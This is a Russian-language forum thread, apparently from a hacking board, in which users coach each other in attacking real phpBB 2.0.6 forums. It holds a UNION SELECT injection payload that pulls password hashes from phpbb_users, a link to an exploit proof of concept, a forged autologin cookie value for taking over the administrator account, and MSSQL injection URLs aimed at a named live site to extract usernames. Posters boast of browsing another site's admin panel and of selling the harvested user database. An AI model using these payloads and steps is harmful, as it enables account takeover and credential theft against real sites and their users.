Посмотрел видео KEZ'а про SQL-injection в форуме PhpBB 2.0.6 - ошибка синтаксиса в модуле search.php (search.php?search_id=1'). Нашел форумы на этом движке, вставляю строку search.php?search_id=1' - выходит ошибка. Далее подставляю id=1 UNION SELECT concat(char(97,58,55,58,123........59,125)) FROM phpbb_users WHERE user_id=2/*, но вместо результатов поиска наблюдаю на странице следующее:
Could not obtain search results
DEBUG MODE
SQL Error : -1 ERROR: syntax error at or near "," at character 104
SELECT search_array FROM phpbb_search_results WHERE search_id = 1 UNION SELECT concat(char(97,58,55,58,123,115,58,49,52........11 0,95,99,104,97,114,115,34,59,105,58,50,48,48,59,12 5)) FROM phpbb_users WHERE user_id=2/* AND session_id = '53a7f9e3d98b3a1c3ca90e2cd6c8ee6b'
Line : 693
File : /home1/home/sa/www/public_html/phpBB2/search.php
Т.е наблюдаю ту же ошибку вместе с введенной мною строкой :( И так в нескольких форумах. Подскажите пожалуйста из-за чего это может происходить, может я делаю чего не правильно....
P.S. Я понимаю что видео на античате не является призывом к действию, и не все может получится, что там показывают, но все же очень прошу помочь в моем вопросе новичку, я это использую только для самообразования...

мда.
не проще ли пользоваца сплойтом, с которым можно сразу стать админом?

мда.
не проще ли пользоваца сплойтом, с которым можно сразу стать админом?
А как он называется и где его мона взять ???

возможно причина в том что было удалено самое превое сообщение.

Сплойт тут вроде
http://rst.void.ru/download/r57phpbb-poc.txt

логинишься в опере\мозиле.
удаляешь phpbb2mysql_sid
меняешь phpbb2mysql_data на

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

жмешь обновить.. и все.

Гы кстати еще полно форумов где катят админские кукисы, особенно буржуйских,
ща по адмнке лазила тут http://www.kona.dk/phpBB2/ :)))) кономейстер гы:)

Сплойт тут вроде
http://rst.void.ru/download/r57phpbb-poc.txt
Эта ссылка не рабочая, есть ссылка на скомпиленный сплоит ???

Блин, Green_Bearт ебе описал самый простой способ и надёжный способ )

Ссылка рабочая, а если запусткать не умеешь так и скажи:)))
Скампилированный был где-то не помню ссылки...
Как тебе уже и советовали тут, не парься а лучше юзай фокус с кукисами:)))

Блин, Green_Bearт ебе описал самый простой способ и надёжный способ )
Да точно самый простой способ...:) :) :)
Спасибо всем, а особенно To Green_bear и Grrl !!!
Давно хотел попробовать и научиться методу подмены кукисов, и вот получилось... :)

Товарищи, сделал всё как в видео на сайте
http://forum.bcs.ru/index.php
ошибку выдаёт

Could not obtain search results

DEBUG MODE

SQL Error : Missing end comment mark '*/'.

SELECT search_array FROM bb_search_results WHERE search_id = 1 UNION SELECT concat(char(97,58,55,58,123,115,58,49,52,58,34,115 ,101,97,114,99,104,95,114,101,115,117,108,116,115, 34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34, 116,111,116,97,108,95,109,97,116,99,104,95,99,111, 117,110,116,34,59,105,58,53,59,115,58,49,50,58,34, 115,112,108,105,116,95,115,101,97,114,99,104,34,59 ,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34), user_password,char(34,59,125,115,58,55,58,34,115,1 11,114,116,95,98,121,34,59,105,58,48,59,115,58,56, 58,34,115,111,114,116,95,100,105,114,34,59,115,58, 52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115, 104,111,119,95,114,101,115,117,108,116,115,34,59,1 15,58,54,58,34,116,111,112,105,99,115,34,59,115,58 ,49,50,58,34,114,101,116,117,114,110,95,99,104,97, 114,115,34,59,105,58,50,48,48,59,125)) FROM phpbb_users WHERE user_id=1/* AND session_id = '[x][x][x][x][x][x]'

Line : 694
File : c:\inetpub\wwwroot\phpbb2\search.php


а дальше не совсем понимаю что делать... объясните пожалуйста. Оч нужно...

1 Удаляеешь все сплойты и видео с компа.
2 Читаем статьи про sql injection
http://forum.antichat.ru/threadnav43966-1-10.html
3 подбираем колонки в ручную, подставляя null, пока не пропадет ошибка.
4 смотришь INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS
http://starcat.dp.ua/doc/mysql-5.1/information-schema.html#schemata-table
5 если не помогло, хотя должно пробуй highlight

am@tory,

3. омг. order by и group by в помощь, и можно и циферки подставлять. Почитай статьи и маны по sql.

4. эти таблицы только в 5 ветке mysql

=\

1. там mssql => легче подзапросы... имхо.. ;)
http://forum.bcs.ru/search.php?search_id=564+or+1=@@version--
2.
http://forum.bcs.ru/search.php?search_id=564+or+1=(select+top+1+userna me+from+bb_users)--
колонку с паролями не помню... сам ищи... ;)

p.s:
Не думал что на таком сайте, может такое старье стоять...
Хорошую(дорогую) базу собрать можно...

Всего зарегистрированных пользователей: 109988

am@tory,

3. омг. order by и group by в помощь, и можно и циферки подставлять. Почитай статьи и маны по sql.

4. эти таблицы только в 5 ветке mysql

=\
3 ofmg. order by у меня на 2.0.6 не работал.
уж поверь я эти статьи до дыр затер

4 для этого можно написать version()

8-)